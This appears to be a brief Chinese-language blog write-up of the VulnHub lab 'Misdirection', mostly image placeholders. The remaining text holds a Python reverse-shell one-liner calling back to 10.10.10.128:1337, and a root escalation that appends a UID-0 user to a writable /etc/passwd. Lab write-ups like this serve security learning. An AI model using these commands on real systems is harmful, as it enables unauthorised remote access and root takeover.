Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

vulnhub >_ Misdirection

Published on 09 Nov 2020

Misdirection

image-20200620201738035

image-20200620201922393

image-20200620203206697

image-20200620204041701

image-20200620205831163

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

image-20200620210205666

image-20200620210736685

image-20200620211706511

passwd可写。

直接增加用户即可

首先先制作用户的hash

openssl passwd -1 -salt evil abcdef

image-20200619115605888

$1$evil$PJUrXHFg5Juh42jLCKQs10

然后仿照passwd文件格式伪造用户信息

evil:$1$evil$PJUrXHFg5Juh42jLCKQs10:0:0::/root:/bin/bash

echo 'evil:$1$evil$PJUrXHFg5Juh42jLCKQs10:0:0::/root:/bin/bash' >> /etc/passwd

image-20200620212243538

image-20200620212534003

related posts